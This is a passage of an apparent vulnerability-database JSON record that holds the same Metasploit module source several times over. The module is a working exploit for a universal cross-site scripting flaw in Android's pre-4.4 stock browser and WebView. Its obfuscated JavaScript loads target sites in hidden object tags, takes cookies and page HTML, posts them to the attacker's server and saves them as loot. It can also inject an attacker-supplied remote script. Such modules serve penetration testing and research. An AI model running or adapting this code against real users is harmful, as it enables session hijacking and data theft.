'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-04-23T12:36:53", "differentElements": ["modified", "published"], "edition": 34}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-04-23T14:38:22", "history": [], "viewCount": 55, "enchantments": {"score": null}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-04-23T14:38:22", "differentElements": ["modified", "published"], "edition": 35}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-04-24T02:53:34", "history": [], "viewCount": 55, "enchantments": {"score": null}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-04-24T02:53:34", "differentElements": ["modified", "published"], "edition": 36}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-04-24T08:49:18", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-04-24T08:49:18", "differentElements": ["modified", "published"], "edition": 37}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-04-26T22:46:02", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-04-26T22:46:02", "differentElements": ["modified", "published"], "edition": 38}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-04-27T00:43:53", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-04-27T00:43:53", "differentElements": ["modified", "published"], "edition": 39}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-05-10T17:05:42", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser 